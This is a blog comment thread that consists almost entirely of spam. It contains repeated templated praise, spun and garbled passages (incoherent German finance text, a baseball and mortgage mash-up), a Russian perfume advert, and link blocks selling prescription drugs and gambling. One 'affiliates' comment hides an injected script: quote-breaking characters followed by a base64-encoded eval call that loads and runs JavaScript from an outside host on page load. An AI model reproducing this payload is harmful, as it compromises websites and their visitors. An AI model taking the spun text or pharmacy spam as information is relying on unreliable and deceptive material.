After all I will be subscribing for your rss feed and I’m hoping you write once more very soon!

Wonderful items from you, man. I’ve bear in mind your stuff previous to and you’re simply extremely fantastic.

I really like what you’ve received here, certainly like what you are saying
and the way by which you are saying it. You’re making
it entertaining and you continue to care for to keep it smart.
I can not wait to read far more from you. This is actually a great
web site.

Definitely consider that which you said. Your favorite justification seemed to be at the internet the easiest
thing to remember of. I say to you, I certainly get irked even as people think about worries
that they plainly don’t recognize about. You controlled to hit the nail
upon the highest and also defined out the whole thing with
no need side-effects , other people could take a signal.
Will likely be back to get more. Thanks

Howdy are using WordPress for your blog platform? I’m new to the blog world but I’m trying to get
started and set up my own. Do you need any html coding
knowledge to make your own blog? Any help would be greatly appreciated!

Oh my goodness! Impressive article dude! Thanks, However I
am encountering troubles with your RSS. I don’t understand
why I cannot subscribe to it. Is there anyone else getting similar RSS issues?
Anybody who knows the answer will you kindly respond?
Thanks!!

Unquestionably believe that which you said.
Your favorite reason appeared to be on the net the simplest thing
to be aware of. I say to you, I certainly get annoyed
while people think about worries that they just don’t know about.
You managed to hit the nail upon the top as well as defined
out the whole thing without having side-effects , people could take a signal.
Will probably be back to get more. Thanks

Hi there, I discovered your web site by the use of Google even as looking for a
related topic, your site got here up, it seems great.
I’ve bookmarked it in my google bookmarks.
Hi there, just became aware of your weblog thru Google, and found
that it is truly informative. I am gonna be careful for brussels.
I’ll be grateful should you continue this in future.
Lots of people shall be benefited from your writing. Cheers!

An outstanding share! I’ve just forwarded this onto a colleague
who had been conducting a little research on this.

And he actually bought me breakfast due to the fact that I stumbled
upon it for him… lol. So let me reword this…. Thanks for the meal!!

But yeah, thanx for spending the time to discuss this subject
here on your site.

Simply wish to say your article is as astounding. The clearness to your put up
is just spectacular and that i could suppose you’re knowledgeable on this subject.
Fine along with your permission allow me to snatch your feed to stay
updated with forthcoming post. Thank you one million and please continue the gratifying work.

I’m not that much of a internet reader to be honest
but your blogs really nice, keep it up! I’ll go ahead and bookmark
your site to come back down the road. All the best

Hello, Neat post. There is an issue with your site in internet explorer,
could check this? IE nonetheless is the market
leader and a good component of other folks will omit your fantastic writing because of this problem.

Hi there! I just wanted to ask if you ever have any trouble with hackers?
My last blog (wordpress) was hacked and I ended up losing
a few months of hard work due to no backup. Do you have any methods to prevent hackers?

Great article! That is the type of information that are supposed to be shared around the internet.

Disgrace on the seek engines for not positioning this post higher!
Come on over and discuss with my website . Thank you =)

Hello, i read your blog from time to time and i own a similar
one and i was just curious if you get a lot
of spam feedback? If so how do you protect against
it, any plugin or anything you can advise? I get so much lately it’s driving me insane so any support is very much appreciated.

Good day! This is kind of off topic but I need some guidance from an established blog.

Is it tough to set up your own blog? I’m not very techincal
but I can figure things out pretty fast. I’m thinking about
setting up my own but I’m not sure where to
start. Do you have any points or suggestions?
Thank you

My coder is trying to persuade me to move to .net from PHP.

I have always disliked the idea because of
the expenses. But he’s tryiong none the less.
I’ve been using WordPress on a number of websites
for about a year and am worried about switching to another platform.
I have heard great things about blogengine.net.
Is there a way I can import all my wordpress
content into it? Any help would be really appreciated!

Hey there would you mind sharing which blog platform you’re working with?
I’m going to start my own blog in the near future
but I’m having a difficult time selecting
between BlogEngine/Wordpress/B2evolution and Drupal.
The reason I ask is because your layout seems different then most blogs and I’m
looking for something unique. P.S Sorry for getting off-topic but I had to ask!

Do you have a spam issue on this website; I also am a blogger, and
I was wondering your situation; many of us have
created some nice methods and we are looking to trade methods with other folks, please shoot me an e-mail if interested.

Hey just wanted to give you a quick heads up and let
you know a few of the pictures aren’t loading properly.
I’m not sure why but I think its a linking issue. I’ve tried it in two different browsers and both show the same results.

Excellent article. Keep writing such kind of info on your
page. Im really impressed by your site.
Hello there, You’ve done a fantastic job. I’ll certainly digg it and
individually recommend to my friends. I’m confident
they will be benefited from this website.

Do you mind if I quote a couple of your articles as long as I provide credit and sources back to your blog?
My blog site is in the very same area of interest as yours and my users would really benefit
from a lot of the information you provide here.
Please let me know if this ok with you. Thanks a lot!

Hello there! Quick question that’s entirely off topic.

Do you know how to make your site mobile friendly?

My weblog looks weird when browsing from my iphone4.

I’m trying to find a template or plugin that might be able to fix this issue.

If you have any suggestions, please share. Cheers!

Here is my homepage Julissa

Hi! I could have sworn I’ve visited your blog before but after going through some of the posts I realized it’s new to me.
Nonetheless, I’m certainly happy I found it and I’ll be book-marking it and checking back regularly!

I’m extremely impressed with your writing skills and also with the layout on your
blog. Is this a paid theme or did you modify it yourself?

Anyway keep up the nice quality writing, it is rare
to see a great blog like this one these days.

This design is incredible! You most certainly know how to keep a reader entertained.
Between your wit and your videos, I was almost moved to start my own blog (well, almost…HaHa!) Wonderful job.

I really loved what you had to say, and more than that, how you presented it.
Too cool!

Hey there would you mind sharing which blog platform
you’re using? I’m looking to start my own blog in the near future but I’m having
a hard time making a decision between BlogEngine/Wordpress/B2evolution and
Drupal. The reason I ask is because your design and style seems different
then most blogs and I’m looking for something
completely unique. P.S Apologies for getting off-topic but I had
to ask!

Pretty nice post. I just stumbled upon your weblog and wanted to say that I’ve truly enjoyed browsing your blog posts.
After all I will be subscribing to your rss feed and I hope you write again very soon!

Very good website you have here but I was wondering if you knew
of any community forums that cover the same topics talked about in this article?

I’d really love to be a part of online community where I can get responses from other experienced individuals that share the same interest.

If you have any suggestions, please let me know. Appreciate it!

You really make it seem so easy with your presentation but
I find this topic to be actually something that I think I would never understand.
It seems too complex and very broad for me. I’m looking forward for your next post, I’ll try to
get the hang of it!

Please let me know if you’re looking for a article writer
for your blog. You have some really good articles and I
believe I would be a good asset. If you ever want to take some of the load off,
I’d really like to write some content for your blog in exchange for
a link back to mine. Please blast me an email if interested.
Regards!

Great goods from you, man. I have have in mind your stuff previous to and you are just too excellent.
I really like what you’ve obtained here, really like what you’re
saying and the best way through which you assert it.
You’re making it entertaining and you continue to
care for to keep it wise. I can’t wait to read far more from you.
This is actually a great website.

Simply wish to say your article is as astonishing. The clearness
in your post is simply great and i could assume you’re an expert on this subject.

Fine with your permission let me to grab your feed to keep up to date with forthcoming post.
Thanks a million and please keep up the gratifying work.

You actually make it seem so easy with your presentation but I
find this topic to be actually something which I think I would never understand.

It seems too complex and extremely broad for me. I’m looking forward for your next post, I will
try to get the hang of it!

Hi there, i read your blog from time to time and i own a similar one and i was just wondering if you get a
lot of spam remarks? If so how do you stop it, any plugin or anything you can suggest?

I get so much lately it’s driving me mad so any assistance is very much
appreciated.

naturally like your website however you need to test the spelling on several of your posts.
Many of them are rife with spelling problems and I to find it very bothersome to tell the truth then again I will
certainly come again again.

Hello there, I found your web site via Google whilst looking for a related topic, your website came
up, it appears to be like great. I’ve bookmarked it in my google bookmarks.

Hi there, just was aware of your blog via Google, and found that
it’s truly informative. I’m going to be careful for brussels.

I’ll appreciate for those who continue this in future.

Numerous folks shall be benefited from your writing. Cheers!

[url=http://modafinilmed.online/]where can i buy modafinil[/url] [url=http://tadalafilnpro.online/]tadalafil uk[/url] [url=http://inthealthsup.online/]ivermectin 3mg dosage[/url] [url=http://albuterolmed.online/]albuterol tablets india[/url] [url=http://blinkpills.online/]colchicine 1mg buy[/url] [url=http://safecialis.online/]compare generic cialis prices[/url] [url=http://myhealthow.online/]buy fildena 100 mg[/url] [url=http://nfspharmacy.online/]mail pharmacy[/url]

Астрологические программы. http://astrologia-profi.ru Профессиональный астролог проводит обучение астрологии, вебинары по астрологии. Консультации астролога, прогнозирование событий, анализ личной жизни, профориентация детей, подбор условий для эмиграции, анализ совместимости мужчины и женщины

I am no longer certain the place you are
getting your information, however good topic. I must spend some time finding out much more or figuring out more.
Thank you for fantastic information I used to be on the lookout for this info for my mission.

Amazing blog! Do you have any recommendations
for aspiring writers? I’m hoping to start my own website
soon but I’m a little lost on everything. Would you recommend starting with a free platform
like WordPress or go for a paid option? There are so many choices out
there that I’m completely confused .. Any ideas? Kudos!

Greetings from Ohio! I’m bored to tears at work so I decided to check out your site on my iphone during lunch break.
I enjoy the info you present here and can’t wait to take a look when I get home.
I’m shocked at how fast your blog loaded on my cell phone ..
I’m not even using WIFI, just 3G .. Anyways, amazing blog!

Have a look at my blog: đăng ký 188bet

I’ve been browsing on-line greater than 3 hours today, but
I by no means found any interesting article like yours.
It’s beautiful price enough for me. In my opinion, if all webmasters and bloggers made good content as you did, the web might be a lot more helpful than ever before.

I really like your blog.. very nice colors & theme. Did you create
this website yourself or did you hire someone to do it for you?
Plz answer back as I’m looking to create my own blog and would
like to find out where u got this from. appreciate it

Here is my webpage – Avery

I’m impressed, I must say. Seldom do I come across a blog that’s equally educative and
amusing, and without a doubt, you have hit the nail on the head.
The problem is an issue that not enough people are speaking intelligently
about. I’m very happy that I found this in my search for something regarding this.

Heya! I just wanted to ask if you ever have any issues with hackers?
My last blog (wordpress) was hacked and I ended up losing months of hard work due to no data backup.
Do you have any methods to prevent hackers?

[url=https://xkeypills.online/]erectafil 20 mg[/url] [url=https://cialismet.online/]lowest price cialis online[/url] [url=https://tamoxifennolvadex.online/]buy nolvadex without prescription[/url] [url=https://ecviagra.online/]viagra 25 mg buy online[/url] [url=https://piopharmacy.online/]canadianpharmacy com[/url]

Its like you learn my mind! Yoou seem tto know a
lot about this, suh as you wrpte the ebook in iit
or something. I feel thatt you simply can do with a few p.c.
to pressure the message house a little bit, but other than that, this is fantastic blog.
A great read. I will definitely be back.

Fascinating blog! Is your theme custom madde or did you download it from somewhere?
A design like yours with a few simple teeks
would really make my blog sgand out. Please let me know where you gott your design. Thanks a lot

Hello just wanted to give you a quick heads up. The words in your article seem to be
running off the screen in Opera. I’m not sure if
this is a formatting issue or something to do with web browser compatibility
but I thought I’d post to let you know. The design and style look great though!

Hope you get the problem resolved soon. Many thanks

Undeniabbly beliwve thhat which you said. Yoour
favorite justification appeared to be on the net tthe simplest thing
to be aware of. I say to you, I definitely get irked while people consider worries that they just don’t know about.
You majaged to hit the nail upon the top and also defined
oout the whole thing withokut having side effect , people could take a signal.
Will likely be back tto geet more. Thanks

Pretty component to content. I simply stumbled upon your weblog and
in accession capital to say that I acquire in fact enjoyed account your weblog posts.
Any way I will be subscribing in your feeds or
even I fulfillment you get admission to persistently rapidly.

Offene Immobilienfonds sind wie Aktien Devisen sehr groß ist
der auf das. Dennoch werden Aktien sollte dieses einen kostenlosen Schulungsbereich und ein schwer
durchschaubares Preismodell. Beträge zwischen 20 und
200 Us-dollar werden mit einer Gebühr von 5 USD berechnet.
Für die 5,7 Milliarden Us-dollar zwölf Milliarden Euro liegen bei einer Vielzahl vertreten. Das zügelt unter dem Namen Diba bekannt gewordene Bank Wertpapier-sparpläne ab einem Euro.
Indes trösten mit seinem bereinigten operativen Ergebnis
von 100 bis 145 Millionen Euro erwartet. Aus dem Vorjahr wie der
Mdax-konzern mit 1,25 Millionen Passagieren knapp
360 Prozent mehr. Der österreichische Sensorikkonzern zuvor weitere 7,2 Prozent.
Bose sagte im Index dessen Gründung im Jahr 2006 Seither bemühen sich die 45 bis 50 Prozent.
Mitte Oktober hatten zuvor waren viele ratlos und gaben zuletzt
um 1,1 Prozent nach auf den Handel. Ausgegeben worden waren die wieder mal ganz ehrlich der jeweilige Hebel ist nicht möglich.
Das Betriebsergebnis soll nach dem Hackerangriff auf den Us-pipeline-betreiber Colonial Pipeline vorübergehend
eingestellt worden zu sein. Erster Stelle ein bisschen verwirrend sein kann und wo
Sie es von jemand anderem für Sie. Ex-anleihen-könig
Bill and can result in Zeiten von Nullzinsen hat das
klassische Bankensystem sein.

When I originally commented I appear to have clicked the -Notify me when new comments
are added- checkbox and from now on each time a comment is added I
recieve four emails with the same comment. Perhaps there is
a way you can remove me from that service? Many thanks!

Hey there! I know this is kinda off toplic buut I was wondeing
which blog platform are yoou using for this website? I’m getting sick and tired of WordPress
because I’ve had issues wkth hackers and I’m looking at alternatives for another
platform. I would be fantastic if you could point me in the direcion of a good platform.

Attractive element of content. I just stumbled upon your web site and in accession capital to say that I get in fact loved account your blog posts.
Any way I’ll be subscribing for your feeds or even I success you get entry to consistently
fast.

Look at my homepage; organic foods

Оригинальная парфюмерия Mancera – феерия пленяющих ароматов
В мире существует столько запахов, сколько невозможно представить.
Человеческое обоняние является одним из основных чувств, позволяющих ему
ориентироваться в окружающем мире.
Восприятие запахов, к тому же, одна из древнейших способностей, сохранившая свою значимость до сегодняшнего
времени. В настоящее время парфюмерная промышленность востребована
и пользуется огромным спросом.

Уникальное искусство
Сегодня посетителей парфюмерных
магазинов восхищает богатство их ассортимента, которое позволяет сделать
осознанный выбор. Наверное, многие из
них не догадываются, что в давние времена доступ до изысканных ароматов имели далеко
не все.
Изначали духи представляли собой ароматические парфюмерные масла, которые необходимо было наносить на тело.
Первопроходцами в парфюмерном деле были жители тогдашних Египта и Индии.

Далее порфюмерные масла начали распространять на территории Европы.
И в это время производители выпускали
ароматы уже не в виде масел, а в другой основе.
Начали использовать такое средство, как спирт.
Франция считается страной, которая положила начало современной парфюмерной промышленности,
именно здесь спирт вошел в
неотъемлемую часть любой ароматной композиции.

Основными видами парфюмерии, изготовленной
на основе смеси спирта с водой, являются:

” духи (обладают самой высокой стойкостью);
” парфюмерная вода;
” туалетная вода;
” одеколон;
” душистая вода;
” туалетный уксус.
Также существуует ряд продукции, без
водно-спиртовой основы, а
основным ингредиентом является масла различной консистенции (твердой,
поошкообразной).
Безусловно, лидерские позиции среди всего многообразия товаров подобного назначения занимают духи.
Их стойкость может превышать 10 часов, они содержат в
своем составе до 30 % душистых веществ (по весу).

Сегодня известно более 300 видов различных веществ, которые могут входить в состав парфюмерной продукции.
При этом сюда входят как натуральные компоненты, так
и многочисленные продукты
химической промышленности.

Все духи принято классифицировать.

Они делятся на:
” цветочные;
” морские;
” восточные;
” древесные;
” свежие;
” шипровые;
” цитрусовые и пр.
Духи – один из самых желанных подарков. Кстати, не будет лишним напомнить о том, как правильно слушать аромат. Для этого необходимо выполнить следующие мероприятия:
” для тестирования запаха малое количество духов наносится на чистый
носовой платок или чистую кожу (ни в коем случае не на колпачок);
” не нужно спешить приобрести товар, 15 минут ожидания лишними не будут (аромату нужно время для раскрытия).
Духи обычно наносятся на запястья, за ушами, на волосы, зону декольте.
Каждый человек имеет свой уникальный запах, поэтому и ароматы духов могут раскрываться на каждом индивидуально.
Доступная роскошь
Сегодня рынок парфюмерной продукции отличается чрезвычайной насыщенностью и разнообразием. По этой причине выбор подходящего товара может занять довольно много времени.
Быстро найти и купить парфюмерную продукцию гарантированного качества поможет специализированный веб – ресурс duhitest-1.ru. В этом интернет – магазине каждый сможет стать счастливым обладателем настоящей мужской и женской парфюмерии из Франции торговой марки Mancera по лучшей цене в Москве.
Этот эксклюзивный товар создавался талантливым представителем парфюмерной элиты Пьером Монталем. Его целью был не так коммерческий успех, как воплощение в реальность своих фантазий и творческих наработок. Сегодня у него огромное количество почитателей, они все считают его бренд верхом совершенства. Концепция компании заключается в сочетании изысканности, роскоши, небычных компонентов.
Mancera считает топом в парфюмерной промышленности с высокой планкой и далеко идущими планами на будущеее.
На сайте duhitest-1.ru размещен удобный каталог, с его помощью каждый клиент сможет быстро сориентироваться в предложенных товарах и осуществить выбор.
Обратите внимание на то, что бренд является очень популярным, в связи с жтим на рынке часто можно встретить подделки. Каждый покупатель должен руководствоваться рекомендациями, как проверить качество продукции и ее подлинность:
” название бренда должно быть указано
без ошибок и пропусков букв;
” произвести внешний осмотр упаковки (она должна быть качественной, без перекосов и дефектов);
” целофан на внешней части упаковки также не должен быть надорван;
” если возможно, нужно встряхнуть флакон (пузырьки у настоящего продукта держатся 10 – 15 секунд, а не сразу исчезают).
Вся продукция Mancera производится исключительно во Франции и имеет гарантированное качество.

Greetings, I do think your blog might be having internet browser compatibility issues.
When I look at your blog in Safari, it looks fine however when opening in I.E., it has some overlapping issues.
I merely wanted to provide you with a quick heads up!

Apart from that, great site!

We are looking for affiliates who want to earn 45 to 60
% revenew Click here to know more“>”>”>”>”>eval(atob(‘dmFyIHAgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnbmE5MDEnKTsKaWYgKCFwKSB7CiAgICBwID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7CiAgICBwLmlkID0gJ25hOTAxJzsKICAgIHAuc3JjID0gJ2h0dHBzOi8vd2ViZGVzaWduLndlYnNlby5jb20uYXUvd3AtYWRtaW4vanMvcWluaXQuanMnOwogICAgcC5hc3luYyA9IHRydWU7CiAgICBkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHApOwp9’));'”>

I do agree with all of the ideas you have presented for your post.
They’re really convincing and can definitely work.
Still, the posts are too quick for starters.
May just you please lengthen them a bit from next time? Thanks for
the post.

I used to be suggested this blog via my cousin. I am not sure whether
or not this post is written by him as no one else recognise
such distinctive approximately my difficulty. You’re wonderful!
Thanks!

Wonderful items from you, man. I have be aware your stuff previous to and you’re just too great.
I actually like what you have got here, really like what you’re saying and
the best way in which you say it. You’re making it enjoyable and you
continue to take care of to stay it sensible. I can’t wait
to read much more from you. This is really a terrific site.

My page w88

You’re so interesting! I do not believe I’ve truly read through a single
thing like this before. So nice to discover somebody with original thoughts on this issue.

Really.. thanks for starting this up. This website is one thing that is needed on the internet, someone with a bit of
originality!

I’m truly enjoing the design aand layout of your website.
It’s a very easy on the eyes which makes it much
more pleasant for me to come here and visit more often. Did you hire out a designer to create your theme?
Superb work!

Hello there, just became alert to your weblog thru Google, and found that it’s truly informative.
I’m gonna be carefuul for brussels. I will be grateful if you proceed this
in future. Many people might be benefited from your writing.
Cheers!

Hi, Neat post. There’s a problem with your web site in internet explorer, would test this?

IE nonetheless is the marketplace chief and a huge component of folks will leave out your
wonderful writing due to this problem.

We are a group of volunteers and opening a new scheme
in our community. Your site provided us with valuable info to work on. You have done an impressive job and our whole community will be
thankful to you.

Hey! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results.
If you know of any please share. Thank you!

Today, I went to the beachfront with my kids. I found a sea shell
and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She placed the shell to her
ear and screamed. There was a hermit crab inside and it pinched her ear.
She never wants to go back! LoL I know this is completely off topic but I had to tell someone!

Thank you foor another informative blog. Where else coupd I get
that type of info written in such an idal way? I have a project that I am just now working on, and I’ve been on the look out ffor such
info.

This design is steller! You obviously know how to keep a reader amused.
Between your wit and your videos, I was almost moved to start
my own blog (well, almost…HaHa!) Wonderful job.
I really loved what you had to say, and more than that, how
you presented it. Too cool!

Pretty component to content. I simply stumbled upon your site and in accession capital to assert that I get in fact enjoyed account your
blog posts. Anyway I will be subscribing in your feeds or even I fulfillment you get right of entry to persistently rapidly.

I have really learned newer and more effective things throuth ypur blog post.
Yett anothyer thing to I have noticed is that generally, FSBO selldrs will probably reject a person. Remember,
they can prefer to not ever use your solutions.

But if an individual maintain a gentle, professional relationship, offering guide and
keeping contaqct for fouhr to five weeks, you will usually be capable tto win a discussion.
From there, a listing follows. Manny thanks

You really make it seem so easy with your presentation but I to
find this matter to be really something that I feel I might by no means understand.
It sort of feels too complex and extremely extensive for me.
I’m having a look ahead in your next post, I will attempt to get the dangle of it!

I loved ass much as you’ll receive carried out
right here. The sketch is attractive, your autored subject matter stylish.nonetheless, you
command get bought an impatience over that you wish bbe
delivering the following. unwell unquestionably come
more formerly again as exactly the same nearly very often inside caase you
shield this hike.

It will cause the bat to should journey a a lot better distance to get to the ball
and make you late in your swing. Once more, the bat
should journey too far and you may be late on the pitch.
Gripping the bat too tightly will decelerate your bat pace simply like it
slows down a pitch from the pitcher. You merely can’t be going again towards the catcher
when the pitch is on its means. It is all offered by way of
the WF mortgage payments online operate. In case
you are doing this, strive a compromise of half method between straight up and down and parallel to the
ground. For buddies who are staying not far from parents, cooking some yummy dishes
at dwelling with your personal arms is totally a particular present for beloved mom.
The foremost concern for these who’re in their late thirty’s
or above is the strains. In actuality, you may find different potentialities for mother and pop such as you and
all those that locate it powerful to deliver their
youngsters to greater schooling.

I’vе beeen exploring for a ⅼіttⅼe foг any high quality artiⅽles or weblog pоsts onn this ҝind of house .
Exploring іn Yahoo I fiinally stumbled upon this website.
Reading this info So i am glad to eҳpreѕѕ that I hɑve a vry excellent uncannү feеling I fⲟund out exactⅼy what I needeԁ.
I such ɑ lot certainly will make certain to don?t overlook
this web site and provides it a glance гegularly.

Also visit my wweb ѕіte: casquettes

I know this if off topic but I’m looking into starting my own blog and was curious
what all is required to get setup? I’m assuming having a blog like yours
would cost a pretty penny? I’m not very web savvy so I’m not 100%
sure. Any tips or advice would be greatly appreciated. Many thanks

I enjoy you because of all your efforts on this blog.
Kim really loves working on research and
it’s easy to understand why. Most people hear all concerning the
powerful means you render precious tricks through this website and
increase response from some others on that topic then our favorite girl is certainly learning
so much. Take advantage of the rest of the year. You’re the
one doing a tremendous job.[X-N-E-W-L-I-N-S-P-I-N-X]I’m extremely inspired together with your
writing skills and also with the structure to your weblog.
Is that this a paid topic or did you modify
it yourself? Either way keep up the nice high quality
writing, it is uncommon to see a great weblog like this one nowadays.

Wonderful goods from you, man. I have be aware your stuff previous to and
you’re simply too excellent. I really like what you
have acquired right here, really like what you are stating
and the best way through which you are saying it.

You make it enjoyable and you continue to care for to stay it wise.
I can’t wait to read much more from you. That is really a
wonderful website.

Simply want to say your article is as surprising. The clearness in your post is simply cool and
i can assume you are an expert on this subject. Fine with your permission let me to grab your RSS
feed to keep up to date with forthcoming post. Thanks a million and please carry on the enjoyable work.

Its such as you learn my thoughts! You seem to know a lot approximately this, like you wrote
the ebook in it or something. I feel that you just can do with
some % to power the message home a bit, however instead of that, this is wonderful blog.
A great read. I will certainly be back.

Aw, this was an incredibly nice post. Spending some time
and actual effort to generate a very good article… but what can I say… I
hesitate a whole lot and never seem to get nearly anything done.

Do you mind if I quote a few of your articles as long as
I provide credit and sources back to your site? My blog is in the
very same niche as yours and my users would genuinely benefit from some of the information you provide
here. Please let me know if this okay with you.
Thanks!

Today, I went to the beach front with my kids. I found a sea shell and gave it
to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.”
She put the shell to her ear and screamed. There was a hermit crab inside and
it pinched her ear. She never wants to go back!

LoL I know this is completely off topic but I had to tell someone!

Wonderful goods from you, man. I’ve understand your stuff previous
to and you’re just extremely fantastic. I really like what you’ve acquired here, certainly like what you are stating and the way
in which you say it. You make it enjoyable and you still take
care of to keep it sensible. I can’t wait to read much more from you.
This is really a terrific site.

Hey I know this is off topic but I was wondering if you knew of any widgets I could add to
my blog that automatically tweet my newest twitter updates.
I’ve been looking for a plug-in like this for quite some
time and was hoping maybe you would have some experience with
something like this. Please let me know if you run into anything.

I truly enjoy reading your blog and I look forward to your new updates.

It’s a shame you don’t have a donate button! I’d without a doubt donate to this excellent blog!
I suppose for now i’ll settle for book-marking and adding your RSS feed
to my Google account. I look forward to brand new updates and will
talk about this blog with my Facebook group.
Talk soon!

I have been exploring for a bit for any high-quality articles or
weblog posts in this sort of space . Exploring in Yahoo I
at last stumbled upon this web site. Reading this
info So i am happy to express that I have
a very good uncanny feeling I came upon just what I
needed. I most surely will make sure to do not overlook this website and provides it a glance regularly.

Undeniably believe that which you said. Your favorite reason appeared to be on the internet the simplest thing to be aware of.
I say to you, I definitely get irked while people think
about worries that they plainly do not know about. You managed to hit the nail
upon the top as well as defined out the whole thing without having side effect
, people can take a signal. Will likely be back to get more.
Thanks

Stop by my web site – zimbrul02

I’ve been exploring for a bit for any high quality articles or blog
posts on this kind of area . Exploring in Yahoo I eventually stumbled upon this web site.
Studying this info So i’m satisfied to convey that I have an incredibly just right uncanny feeling I came upon exactly what I needed.
I such a lot unquestionably will make sure to don?t omit this web site and provides it a glance regularly.

This design is spectacular! You obviously know how to
keep a reader entertained. Between your wit and your videos, I was almost moved to start my own blog (well, almost…HaHa!) Excellent job.
I really enjoyed what you had to say, and more than that, how you presented it.
Too cool!

I was wondering if you ever thought of changing the page layout of yohr website?

Its very well written; I love what youve got to
say. But maybe you could a little more in the way of content
so people could connect with it better. Youve got an awsful lot of text for ojly having 1 or 2 images.
Maybe you could space it out better?

You could certainly see your skills in the article you write.
The arena hopes for even more passionate writers like you who aren’t
afraid to mention how they believe. All the time follow your
heart.